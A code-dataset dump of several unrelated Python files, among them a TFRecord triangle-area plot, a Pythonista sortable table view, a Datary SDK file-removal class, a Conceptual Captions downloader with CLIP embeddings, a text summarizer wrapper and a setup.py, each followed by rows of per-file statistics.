input_list_name = "lists/TFR_2dt_100k_unsorted_s50_areafix_train.lst"
with open(input_list_name) as fobj:
filename_list = [x.strip("\n") for x in fobj.readlines()]
print("input list hast {} files".format(len(filename_list)))
print("load&batch-test...")
raw_dataset = tf.data.TFRecordDataset(filename_list)
print(raw_dataset)
parsed_dataset = raw_dataset.map(tfr_helper.parse_t2d)
batch_size = 1000
max_batches = 10
parsed_dataset_batched = parsed_dataset.batch(batch_size)
# parsed_dataset_batched = parsed_dataset_batched.repeat(10)
print(parsed_dataset)
counter = 0
number_of_batches = 0
plt.figure()
min_area = 10000
for batch_idx, sample in enumerate(parsed_dataset_batched):
if batch_idx >= max_batches:
break
number_of_batches = batch_idx + 1
points = sample[1]["points"]
# points[batch_sample, point, component]
a_x = points[:, 0, 0]
a_y = points[:, 0, 1]
b_x = points[:, 1, 0]
b_y = points[:, 1, 1]
c_x = points[:, 2, 0]
c_y = points[:, 2, 1]
ab = np.sqrt((a_x - b_x) ** 2 + (a_y - b_y) ** 2)
bc = np.sqrt((b_x - c_x) ** 2 + (b_y - c_y) ** 2)
ca = np.sqrt((c_x - a_x) ** 2 + (c_y - a_y) ** 2)
areas = np.abs((a_x * (b_y - c_y) + b_x * (c_y - a_y) + c_x * (a_y - b_y)) / 2.0)
inner_circle = 2 * areas / (ab + bc + ca)
outer_circle = ab * bc * ca / (4.0 * areas)
min_area = np.minimum(min_area, np.min(areas))
print(areas)
print(inner_circle)
print(outer_circle)
plt.scatter(areas, inner_circle / outer_circle)
# print(a, a.shape)
print("min_area", min_area)
plt.show()
print("{} samples in list: {}".format(number_of_batches * batch_size, input_list_name))
print(" Done.")
print("Finished.")
| 31.183099
| 91
| 0.617435
| 337
| 2,214
| 3.738872
| 0.332344
| 0.072222
| 0.063492
| 0.04127
| 0.060317
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030686
| 0.249322
| 2,214
| 70
| 92
| 31.628571
| 0.727437
| 0.058717
| 0
| 0
| 0
| 0
| 0.09139
| 0.023569
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.096154
| 0
| 0.096154
| 0.230769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af71f9e9ddb2979aa18dd52c6ff6dae1a9583788
| 4,090
|
py
|
Python
|
Three-Column-Sortable-TableView.py
|
humberry/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 115
|
2015-03-01T20:22:19.000Z
|
2022-01-23T16:16:48.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 8
|
2015-01-05T10:12:24.000Z
|
2020-08-02T07:43:10.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 37
|
2015-05-10T03:24:33.000Z
|
2022-03-11T04:06:47.000Z
|
# coding: utf-8
import ui, os, datetime
from operator import itemgetter
class MyTableViewDataSource(object):
def __init__(self, row_height):
self.row_height = row_height
self.width = None
def tableview_number_of_rows(self, tableview, section):
return len(tableview.data_source.items)
def tableview_cell_for_row(self, tableview, section, row):
self.width, height = ui.get_screen_size()
cell = ui.TableViewCell()
cell.bounds = (0, 0, self.width, self.row_height)
for i in range(3):
self.make_labels(cell, tableview.data_source.items[row][i], i)
return cell
def make_labels(self, cell, text, pos):
label = ui.Label()
label.border_color = "lightgrey"
label.border_width = 0.5
if pos == 2:
label.text = str(datetime.datetime.fromtimestamp(text))
else:
label.text = str(text)
label.frame = (pos * self.width / 3, 0, self.width / 3, self.row_height)
label.alignment = ui.ALIGN_CENTER
cell.content_view.add_subview(label)
class MyTableView(ui.View):
def __init__(self):
self.dirs = []
self.files = []
self.order = 'asc'
self.active_button = None
self.button_height = 50
self.btn_name = self.make_buttons("Name")
self.btn_size = self.make_buttons("Size")
self.btn_date = self.make_buttons("Date")
self.tv = ui.TableView()
self.tv.row_height = 30
self.tv.data_source = MyTableViewDataSource(self.tv.row_height)
self.get_dir()
self.all_items = self.dirs + self.files
self.tv.data_source.items = self.all_items
self.name = "TableView-Test"
self.tv.allows_selection = False
self.add_subview(self.tv)
self.present("fullscreen")
def make_buttons(self, name):
button = ui.Button()
button.name = name
button.title = name
button.border_color = 'blue'
button.border_width = 1
button.corner_radius = 3
button.background_color = 'white'
button.action = self.btn_action
self.add_subview(button)
return button
def btn_action(self, sender):
names = [self.btn_name.name, self.btn_size.name, self.btn_date.name] #['Name', 'Size', 'Date']
sender_index = names.index(sender.name) #0/1/2
if self.order == 'asc':
self.order = 'desc'
self.all_items = sorted(self.all_items, key=itemgetter(sender_index))
else:
self.order = 'asc'
self.all_items = sorted(
self.all_items, key=itemgetter(sender_index), reverse=True
)
self.tv.data_source.items = self.all_items
self.tv.reload()
def layout(self):
self.tv.reload()
self.btn_name.frame = (
0 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_size.frame = (
1 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_date.frame = (
2 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.tv.frame = (
0,
self.button_height,
self.width,
self.height - self.button_height,
)
def get_dir(self):
path = os.getcwd()
if path == os.path.expanduser("~"):
self.dirs = []
else:
self.dirs = [["..", 0, 0.0]]
self.files = []
for entry in sorted(os.listdir(path)):
full_pathname = path + "/" + entry
if os.path.isdir(full_pathname):
date = os.path.getmtime(full_pathname)
self.dirs.append((entry, "<DIR>", date))
else:
size = os.path.getsize(full_pathname)
date = os.path.getmtime(full_pathname)
self.files.append((entry, size, date))
MyTableView()
| 31.953125
| 103
| 0.55868
| 494
| 4,090
| 4.461538
| 0.232794
| 0.049002
| 0.036298
| 0.024955
| 0.211434
| 0.194192
| 0.194192
| 0.194192
| 0.182849
| 0.107532
| 0
| 0.012686
| 0.325428
| 4,090
| 127
| 104
| 32.204724
| 0.786154
| 0.010269
| 0
| 0.238938
| 0
| 0
| 0.018793
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079646
| false
| 0
| 0.017699
| 0.00885
| 0.141593
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af7371f20bd26e4f799d725d92aa211ad0557f49
| 668
|
py
|
Python
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | 2
|
2020-10-12T11:33:00.000Z
|
2021-12-20T06:33:54.000Z
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot as pl
from matplotlib.colors import LogNorm
fn = '../pozo-steep-vegetated-pcl.npy'
pts = np.load(fn)
x, y = pts[:, 0], pts[:, 1]
ix = (0.2 * (x - x.min())).astype('int')
iy = (0.2 * (y - y.min())).astype('int')
shape = (100, 100)
#xb = np.arange(shape[1]+1)
#yb = np.arange(shape[0]+1)
xb = np.arange(x.min(), x.min()+500, 5)
yb = np.arange(y.min(), y.min()+500, 5)
bins = np.zeros(shape)
for j in range(len(ix)):
bins[iy[j], ix[j]] += 1
cmap = pl.cm.magma_r
norm = LogNorm()
pl.pcolormesh(xb, yb, bins,
cmap = cmap,
#norm = norm,
)
pl.colorbar()
pl.axes().set_aspect('equal')
pl.show()
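The manual loop above can also be expressed with numpy's histogram2d; note it treats xb/yb as bin edges (so 99x99 cells here) and drops points beyond the last edge, making this an approximate equivalent:
H, y_edges, x_edges = np.histogram2d(y, x, bins=[yb, xb])
# H[i, j] counts points in the 5 m cell [yb[i], yb[i+1]) x [xb[j], xb[j+1])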
| 22.266667
| 40
| 0.586826
| 121
| 668
| 3.223141
| 0.446281
| 0.082051
| 0.061538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045872
| 0.184132
| 668
| 29
| 41
| 23.034483
| 0.669725
| 0.095808
| 0
| 0
| 0
| 0
| 0.069884
| 0.051581
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.136364
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af74d606a269a83e28010d18de482c23c6ab0542
| 5,600
|
py
|
Python
|
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Datary sdk Remove Operations File
"""
import os
from urllib.parse import urljoin
from datary.auth import DataryAuth
from datary.operations.limits import DataryOperationLimits
import structlog
logger = structlog.getLogger(__name__)
class DataryRemoveOperation(DataryAuth, DataryOperationLimits):
"""
Datary RemoveOperation module class
"""
def delete_dir(self, wdir_uuid, path, basename):
"""
Delete directory.
-- NOT IN USE --
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
path str path to directory
basename str directory name
================ ============= ====================================
"""
logger.info(
"Delete directory in workdir.",
wdir_uuid=wdir_uuid,
basename=basename,
path=os.path.join(path, basename))
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "delete",
"filemode": 40000,
"basename": path,
"basename": basename}
response = self.request(
url, 'GET', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"Directory has been deleted in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
else:
logger.error(
"Fail to delete Directory in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
def delete_file(self, wdir_uuid, element):
"""
Delete file.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
element Dic element with path & basename
================ ============= ====================================
"""
logger.info(
"Delete file in workdir.",
element=element,
wdir_uuid=wdir_uuid)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {
    "action": "remove",
    "filemode": 100644,
    "path": element.get('path'),  # "path" is an assumed field name
    "basename": element.get('basename')
}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"File has been deleted.",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
else:
logger.error(
"Fail to delete file in workdir",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
def delete_inode(self, wdir_uuid, inode):
"""
Delete using inode.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
inode str directory or file inode.
================ ============= ====================================
"""
logger.info("Delete by inode.", wdir_uuid=wdir_uuid, inode=inode)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "remove", "inode": inode}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info("Element has been deleted using inode.")
else:
logger.error(
"Fail to delete file by inode in workdir",
url=url,
workdir=wdir_uuid,
inode=inode)
def clear_index(self, wdir_uuid):
"""
Clear changes in repo.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
================ ============= ====================================
"""
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
response = self.request(url, 'DELETE', **{'headers': self.headers})
if response:
logger.info("Repo index has been cleared.")
return True
else:
logger.error(
"Fail to clean the workdir index",
url=url,
workdir=wdir_uuid)
return False
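# A minimal usage sketch (hypothetical uuid and paths; assumes DataryAuth
# supplies credentials, URL_BASE, headers and request()):
#
#     op = DataryRemoveOperation()
#     op.delete_file("some-wdir-uuid", {"path": "folder", "basename": "file.csv"})
#     op.clear_index("some-wdir-uuid")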
| 32.55814
| 78
| 0.411786
| 426
| 5,600
| 5.323944
| 0.201878
| 0.091711
| 0.046296
| 0.035273
| 0.564815
| 0.527778
| 0.518519
| 0.439594
| 0.415344
| 0.298501
| 0
| 0.003408
| 0.37125
| 5,600
| 171
| 79
| 32.748538
| 0.640727
| 0.299107
| 0
| 0.553191
| 0
| 0
| 0.161863
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0
| 0.053191
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af76cb63ff7f339b7e7e1d830fd28ab78f3db4d3
| 9,199
|
py
|
Python
|
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
import torch
import clip
from torch.utils.data import DataLoader, Dataset
from PIL import Image
import pickle
from tqdm import tqdm
import os
import csv
import threading
import requests
import shutil
import PIL
from typing import List, Tuple, Optional
import argparse
from pathlib import Path
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ConceptualDS(Dataset):
@staticmethod
def get_all_data(data_root: str, suffix: str):
data = []
        for i in range(2):  # reads the (hard-coded) first two per-thread shard files
out_data_path = f"{data_root}/conceptual_{suffix}_{i:02d}.pkl"
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
raw_data = pickle.load(f)["info"]
data.append(raw_data)
return data
@staticmethod
def collect(data_root: str, suffix: str):
raw_data = ConceptualDS.get_all_data(data_root, suffix)
data = []
for thread_data in raw_data:
for item in thread_data:
data.append((item, thread_data[item]["caption"]))
return data
def __len__(self):
return len(self.data)
def __getitem__(self, item: int):
image_name, caption = self.data[item]
image_path = f"{self.data_root}/{self.suffix}/{image_name}.jpg"
is_error = False
image = self.dummy
try:
image = self.preprocess(Image.open(image_path)) #.resize(224))
except PIL.UnidentifiedImageError:
is_error = True
except OSError:
is_error = True
        except Exception:  # was BaseException, which would also swallow KeyboardInterrupt
            is_error = True
if is_error:
return image, "", image_name
return image, caption, image_name
def __init__(self, data_root: str, preprocess, suffix: str):
self.suffix = suffix
self.data_root = data_root
self.data = self.collect(data_root, suffix)
# print(self.data)
self.preprocess = preprocess
self.dummy = torch.zeros(3, 224, 224)
def save_pickle(data, out_path: str, recover_index: Optional[int] = None):
if os.path.isfile(out_path) and recover_index is not None:
recover_path = f'{out_path[:-4]}_{recover_index:02d}.pkl'
shutil.copyfile(out_path, recover_path)
with open(out_path, 'wb') as f:
pickle.dump(data, f)
def get_image(url: str, out_path: str, timeout=10):
try:
r = requests.get(url, stream=True, timeout=timeout)
if r.status_code == 200:
with open(out_path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
return True
return False
    except Exception:  # was BaseException, which would also swallow KeyboardInterrupt
        return False
def thread(urls: List[Tuple[List[str], int]], thread_id: int, progress: tqdm, lock: Optional[threading.Lock],
suffix: str, conceptual_root: str):
out_root = f"{conceptual_root}/{suffix}"
out_data_path = f"{conceptual_root}/conceptual_{suffix}_{thread_id:02d}.pkl"
recover_index = 0
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
data = pickle.load(f)
# print(data)
parsed = data['parsed']
info = data['info']
else:
parsed = set()
info = {}
for i in range(0, len(urls)):
(caption, url), ind = urls[i]
name = f"{ind:08d}"
out_path = f"{out_root}/{name}.jpg"
if url not in parsed and not os.path.isfile(out_path) and get_image(url, out_path):
parsed.add(url)
info[name] = {"url": url, "caption": caption}
if lock is not None:
lock.acquire()
try:
progress.update()
finally:
lock.release()
else:
progress.update()
if (i + 1) % 10 == 0:
# print(f'BINNEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, recover_index)
recover_index = 1 - recover_index
# print(f'BUITEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, 2)
return 0
def download_conceptual(conceptual_root: str, num_threads: int, num_images: int):
urls = []
for suffix in ( "train", "val"):
if suffix == "train":
training_path = f"{conceptual_root}/Train_GCC-training.tsv"
with open(training_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
train_sub_set_path = f'{conceptual_root}/subset_Train_GCC-training.tsv'
if not os.path.exists(train_sub_set_path):
myfile = Path(train_sub_set_path)
myfile.touch(exist_ok=True)
with open(train_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = train_sub_set_path
else:
val_path = f'{conceptual_root}/Validation_GCC-1.1.0-Validation.tsv'
with open(val_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
val_sub_set_path = f'{conceptual_root}/subset_Val_GCC-training.tsv'
if not os.path.exists(val_sub_set_path):
myfile = Path(val_sub_set_path)
myfile.touch(exist_ok=True)
with open(val_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = val_sub_set_path
with open(tsv_path) as f:
read_tsv = csv.reader(f, delimiter="\t")
for i, row in enumerate(read_tsv):
urls.append((row, i))
progress = tqdm(total=len(urls))
if num_threads == 1:
thread(urls, 0, progress, None, suffix, conceptual_root)
else:
groups = []
threads = []
lock = threading.Lock()
split_size = len(urls) // num_threads
for i in range(num_threads):
if i < num_threads - 1:
groups.append(urls[i * split_size: (i + 1) * split_size])
else:
groups.append(urls[i * split_size:])
for i in range(num_threads):
threads.append(threading.Thread(target=thread, args=(groups[i], i, progress, lock, suffix, conceptual_root)))
for i in range(num_threads):
threads[i].start()
for i in range(num_threads):
threads[i].join()
progress.close()
def add_period(caption: str):
    caption = caption.strip()
    if not caption:
        # guard added: an empty caption would make the indexing below raise
        return caption
    if caption[-1] != '.':
        caption = caption + '.'
    elif len(caption) >= 2 and caption[-2] == ' ':
        caption = caption[:-2] + '.'
return caption
def create_clip_embeddings(conceptual_root: str, clip_model_type: str):
all_embeddings = []
all_captions = []
for suffix in ("train", "val"):
clip_model, preprocess = clip.load(clip_model_type, device=device, jit=False)
clip_model = clip_model.eval()
ds = ConceptualDS(conceptual_root, preprocess, suffix)
dl = DataLoader(ds, batch_size=2, shuffle=False, drop_last=False)
progress = tqdm(total=len(dl))
counter = 0
clip_model_name = clip_model_type.replace('/', '_')
out_data_path = f"{conceptual_root}/conceptual_clip_{clip_model_name}_{suffix}.pkl"
recover_index = 0
for i, data in enumerate(dl):
images, captions, image_names = data
images = images.to(device)
with torch.no_grad():
prefix = clip_model.encode_image(images).to(device)
# print(f'prefix.shape = {prefix.shape}')
is_valid = list(map(lambda x: x != "", captions))
mask = torch.tensor(is_valid)
all_embeddings.append(prefix[mask])
captions = [caption for j, caption in enumerate(captions) if is_valid[j]]
image_names = [image_name for j, image_name in enumerate(image_names) if is_valid[j]]
all_captions.extend([{"caption": add_period(caption), "clip_embedding": counter + j, "image_id": image_name}
for j, (caption, image_name) in enumerate(zip(captions, image_names))])
progress.update()
counter += len(captions)
if (i + 1) % 1000 == 0:
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, recover_index)
recover_index = 1 - recover_index
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, 2)
progress.close()
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', default='./data/conceptual')
parser.add_argument('--clip_model_type', default="ViT-B/32", choices=('RN50', 'RN101', 'RN50x4', 'ViT-B/32'))
parser.add_argument('--num_threads', type=int, default=1)
args = parser.parse_args()
download_conceptual(args.data_root, args.num_threads, 100)
create_clip_embeddings(args.data_root, args.clip_model_type)
if __name__ == '__main__':
main()
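# A minimal CLI sketch (hypothetical paths; the Conceptual Captions TSV files
# must already be present under --data_root):
#
#     python parse_conceptual.py --data_root ./data/conceptual \
#         --clip_model_type ViT-B/32 --num_threads 4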
| 37.70082
| 137
| 0.589521
| 1,174
| 9,199
| 4.400341
| 0.181431
| 0.03523
| 0.023422
| 0.012776
| 0.252226
| 0.21506
| 0.192412
| 0.15331
| 0.130081
| 0.130081
| 0
| 0.011553
| 0.294271
| 9,199
| 243
| 138
| 37.855967
| 0.784196
| 0.014567
| 0
| 0.254717
| 0
| 0
| 0.084115
| 0.053207
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.070755
| 0.004717
| 0.183962
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af78d3f22f044a728a9a4c210c9bf8cdba9f1cf9
| 7,170
|
py
|
Python
|
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
# Global objects
import datetime
import hashlib
import subprocess
import time
import nltk
from Prediction import Summarizer
from data_utils import DataProcessor
PAD_ID = 0
UNK_ID = 1
vocab_dict, word_embedding_array = DataProcessor().prepare_vocab_embeddingdict()
# # print (len(vocab_embed_object.vocab_dict)-2)
model_cpu = Summarizer(vocab_dict, word_embedding_array)
class Preprocess:
def timestamp(self):
return datetime.datetime.fromtimestamp(time.time()).strftime('[%Y-%m-%d %H:%M:%S]')
def Hashhex(self, s):
"""Returns a heximal formated SHA1 hash of the input string.
Args:
s: The string to hash.
Returns:
            A hexadecimal formatted hash of the input string.
"""
h = hashlib.sha1()
        h.update(s.encode('utf-8'))  # hashlib requires bytes, not str, under Python 3
return h.hexdigest()
def stanford_processing(self, log, story, highlights):
story_corenlp = None
highlights_corenlp = None
try:
log += self.timestamp() + " Start Stanford Processing (SSegmentation,Tokenization,NERTagging) ...\n"
story_corenlp = subprocess.check_output(['./corenlp.sh', story])
highlights_corenlp = subprocess.check_output(['./corenlp.sh', highlights])
log += self.timestamp() + " Stanford Processing finished.\n"
except Exception as e:
log += self.timestamp() + " Stanford Processing failed.\n" + str(e) + "\n"
return log, story_corenlp, highlights_corenlp
def corenlp_output_parser(self, text):
data_org = []
# data_ner = []
# data_orglower_anonym = []
data_org_vocabid = []
# Parse Stanford Output Data
# sentdata_list = corenlp_output.strip().split("Sentence #")[1:]
for sentdata in nltk.sent_tokenize(text):
line_org = []
# line_ner = []
for word in nltk.word_tokenize(sentdata):
line_org.append(word)
# if token.startswith("NamedEntityTag="):
# if token.startswith("NamedEntityTag=PERSON"):
# line_ner.append("PERSON")
# elif token.startswith("NamedEntityTag=LOCATION"):
# line_ner.append("LOCATION")
# elif token.startswith("NamedEntityTag=ORGANIZATION"):
# line_ner.append("ORGANIZATION")
# elif token.startswith("NamedEntityTag=MISC"):
# line_ner.append("MISC")
# else:
# line_ner.append("O")
data_org.append(line_org)
# data_ner.append(line_ner)
line_org_vocabid = [vocab_dict[word] if word in vocab_dict else UNK_ID
for word in line_org]
data_org_vocabid.append(line_org_vocabid)
return data_org, data_org_vocabid # data_ner, data_orglower_anonym
def stanford_output_modelIn_processing(self, log, story_corenlp, highlights_corenlp):
story_line_org = None
highlights_line_org = None
document_modelIn = None
try:
log += self.timestamp() + " Start model input preparation (StanOutputParsing,OriginalCases,NotAnonymized,VocabIdMap) ...\n"
story_line_org, story_org_vocabid = self.corenlp_output_parser(story_corenlp)
# print story_line_org, story_orglower_anonym_vocabid
highlights_line_org, _ = self.corenlp_output_parser(highlights_corenlp)
# print highlights_line_org
document_modelIn = DataProcessor().prepare_document_modelIn(story_org_vocabid, [], [])
# print document_modelIn
log += self.timestamp() + " Model input preparation finished.\n"
except Exception as e:
log += self.timestamp() + " Model input preparation failed.\n" + str(e) + "\n"
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
return log, story_line_org, highlights_line_org, document_modelIn
def refresh_prediction(self, log, document_modelIn, doclen):
# global model_cpu
# print document_modelIn, doclen
selected_sentids = None
try:
log += self.timestamp() + " Start predicting with Refresh (Best CNN-trained model from Narayan, Cohen and Lapata, 2018) ...\n"
selected_sentids = model_cpu.prediction(document_modelIn, doclen)
log += self.timestamp() + " Refresh prediction finished.\n"
except Exception as e:
log += self.timestamp() + " Refresh prediction failed.\n" + str(e) + "\n"
return log, selected_sentids
def run_textmode(self, text):
'''Text MODE
'''
# Start a log
log = ""
try:
log += self.timestamp() + " Summarizing a text: No side information used.\n"
# No HTML Parsing and Text Extraction Needed
story = text
highlights = ""
# # Start Stanford Parsing for Sentence Segmentation, Tokenization and NER Tagging
# log, story_corenlp, highlights_corenlp = self.stanford_processing(log, story, highlights)
# print(log)
# if (story_corenlp is None) or (highlights_corenlp is None):
# raise Exception
# print story_corenlp, highlights_corenlp
# Stanford Output Parsing and Preparing input to the model
log, story_line_org, highlights_line_org, document_modelIn = self.stanford_output_modelIn_processing(log,
story,
highlights)
print(log)
if (story_line_org is None) or (highlights_line_org is None) or (document_modelIn is None):
raise Exception
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
# SideNet Prediction
log, selected_sentids = self.refresh_prediction(log, document_modelIn, len(story_line_org))
print(log)
if (selected_sentids is None):
raise Exception
selected_sentids.sort()
print(selected_sentids)
# Generate final outputs
log += self.timestamp() + " Producing output summaries. \n"
slead = "\n".join([" ".join(sent) for sent in story_line_org[:3]])
srefresh = "\n".join([" ".join(story_line_org[sidx]) for sidx in selected_sentids])
sgold = "\n".join([" ".join(sent) for sent in highlights_line_org])
# print log
# print slead
# print ssidenet
# print sgold
return log, slead, srefresh, sgold
except Exception as e:
log += self.timestamp() + " Failed.\n" + str(e) + "\n"
print(log)
return log, "", "", ""
| 40.055866
| 138
| 0.58159
| 751
| 7,170
| 5.336884
| 0.225033
| 0.045409
| 0.047904
| 0.031188
| 0.317615
| 0.217565
| 0.143962
| 0.114022
| 0.092565
| 0.036926
| 0
| 0.002287
| 0.329149
| 7,170
| 178
| 139
| 40.280899
| 0.830977
| 0.235704
| 0
| 0.144444
| 0
| 0.011111
| 0.112618
| 0.018026
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077778
| false
| 0
| 0.077778
| 0.011111
| 0.255556
| 0.044444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af7b2d5d99f6baeaacbb0d347417a474259a0efd
| 447
|
py
|
Python
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 62
|
2015-11-19T18:28:56.000Z
|
2021-12-27T02:50:30.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 33
|
2015-11-23T01:11:33.000Z
|
2021-04-15T04:23:15.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 28
|
2015-11-24T18:49:33.000Z
|
2021-12-28T16:48:55.000Z
|
import versioneer
from setuptools import setup
setup_args = dict(
name='nbexamples',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='BSD',
platforms=['Jupyter Notebook'],
packages=[
'nbexamples'
],
include_package_data=True,
install_requires=[
'notebook>=4.2.0',
'nbconvert',
'nbformat'
]
)
if __name__ == '__main__':
setup(**setup_args)
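# A standard setuptools flow applies (versioneer additionally expects the
# accompanying versioneer.py and setup.cfg at the project root):
#
#     pip install .          # regular install
#     pip install -e .       # editable/development install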
| 19.434783
| 39
| 0.626398
| 44
| 447
| 6.022727
| 0.704545
| 0.075472
| 0.10566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00885
| 0.241611
| 447
| 22
| 40
| 20.318182
| 0.772861
| 0
| 0
| 0
| 0
| 0
